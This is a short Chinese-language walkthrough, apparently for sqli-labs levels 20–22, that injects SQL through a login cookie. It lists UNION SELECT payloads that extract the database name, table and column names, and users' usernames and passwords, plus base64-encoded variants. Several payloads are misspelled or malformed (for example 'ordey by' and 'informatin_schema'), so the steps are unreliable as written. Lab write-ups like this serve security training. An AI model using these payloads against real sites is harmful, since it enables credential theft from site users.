首先20关过滤了post注入 就只好从cookie入手(用火狐的插件hackbar)
先登陆一下获取cookie信息 
稍微知道一下cookie的格式 然后判断为字符型注入
uname=aaa’ ordey by 4# 获取位数 数字一个个尝试
到出现这种情况
然后union语句了
uname =aaa’ union select 1,2,3 #
uname=aaa’ union select 1,2,database() # (获取当前使用的数据库名字) 执行后是security
uname=aaa’ union select 1,2,group_concat(table_name) from informatin_schema.tables where table_schema=‘security’ # (获得所有表名)
uname=aaa’ union select 1,2,group_concat(columns_name) from information_schema.columns where table_schema=’security’ and table name=’users’ # 获得字段
uname=aaa’ union select 1,2,group_concat(username,0x7e,password)from security,users # 获得字段的数据
或者用这个语句uname=aaa’ union select 1,2,group_concat(concat_ws(‘-‘,id,username,password)) from users #
21关稍微变一下用base64 编码一下uname= 之后的内容即可和20一样的 注入符号方式也不一样 构建‘)这样的注入符号 22也是一样就注入符号为” 双引号 然后也是base64 编码一下